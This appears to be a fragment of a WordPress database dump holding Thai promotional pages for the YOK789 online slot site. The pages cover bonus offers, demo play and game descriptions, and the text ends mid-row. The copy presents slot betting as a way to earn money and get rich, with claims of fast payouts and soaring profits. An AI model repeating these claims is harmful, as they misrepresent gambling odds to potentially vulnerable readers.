<p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:47:39','2026-02-24 07:47:39','',44,'https://yok789ss.com/?p=335',0,'revision','',0),(339,3,'2026-02-25 02:19:17','2026-02-25 02:19:17','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-25 02:19:17','2026-02-25 02:19:17','',16,'https://yok789ss.com/?p=339',0,'revision','',0),(340,3,'2026-02-25 02:19:17','2026-02-25 02:19:17','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-25 02:19:17','2026-02-25 02:19:17','',16,'https://yok789ss.com/?p=340',0,'revision','',0),(341,3,'2026-02-25 02:19:17','2026-02-25 02:19:17','<a href=\"https://luca333auto.com/\">\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต YOK789 เว็บสล็อตเว็บตรงอันดับ 1 รวมเกมแตกไว </h1> <p data-pm-slice=\"0 0 []\">ทางเข้าเล่น YOK789 คือแพลตฟอร์มสล็อตออนไลน์ที่ได้รับความนิยมอย่างรวดเร็ว ด้วยระบบเว็บตรงไม่ผ่านเอเย่นต์ และใช้ API แท้จาก USA ทำให้เกมมีความเสถียร ภาพสวย และแตกไว ถูกใจสายสล็อตรุ่นใหม่ รวมเกมฮิตหลากหลายค่าย อัปเดตใหม่ตลอดเวลา รองรับการใช้งานผ่านมือถือและคอมพิวเตอร์ สมัครยูสใหม่รับโบนัสฟรีทุกวัน พร้อมโปรโมชั่นหมุนฟรี และเครดิตคืนยอดเสีย เหมาะสำหรับผู้เล่นที่มองหาประสบการณ์สนุก ตื่นเต้น พร้อมระบบฝากถอนรวดเร็ว อย่างไรก็ตาม ควรเล่นอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อความบันเทิง และความรับผิดชอบต่อการเงินของตนเอง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp\" alt=\"PG\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/PG.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/PG-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp\" alt=\"Microgaming\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Microgaming.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Microgaming-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp\" alt=\"JILI\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JILI.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JILI-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp\" alt=\"JOKER\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/JOKER.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/JOKER-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp\" alt=\"Slot xo\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-xo.webp 314w, https://amb18b.com/wp-content/uploads/2026/02/Slot-xo-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp\" alt=\"pragmatic\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/pragmatic.webp 651w, https://amb18b.com/wp-content/uploads/2026/02/pragmatic-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2026-02-25 02:19:17','2026-02-25 02:19:17','',16,'https://yok789ss.com/?p=341',0,'revision','',0),(342,3,'2026-02-25 02:20:49','2026-02-25 02:20:49','<h1>โปรโมชั่น YOK789 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นสุดคุ้มจาก YOK789 เอาใจสายสล็อตโดยเฉพาะ กับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มโอกาสสนุกได้มากขึ้นตั้งแต่เริ่มต้น ไม่ต้องฝากเยอะก็ร่วมลุ้นได้ พร้อมเงื่อนไขถอนไม่อั้น รองรับทั้งสมาชิกใหม่และสมาชิกปัจจุบัน รวมโปรสล็อตหลากหลายรูปแบบ ไม่ว่าจะเป็นโบนัสฝากแรก โบนัสฝากประจำ โปรโมชั่นคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาล อัปเดตใหม่ตลอดเวลา ช่วยเพิ่มความคุ้มค่าในการเล่นมากยิ่งขึ้น ระบบฝากถอนอัตโนมัติ รวดเร็ว ปลอดภัย รองรับธนาคารชั้นนำ เหมาะสำหรับผู้ที่ต้องการความตื่นเต้นและความบันเทิงในรูปแบบออนไลน์ อย่างไรก็ตาม ควรเล่นอย่างมีสติ วางแผนการเงินทุกครั้ง และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อการเล่นอย่างรับผิดชอบและปลอดภัย</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, 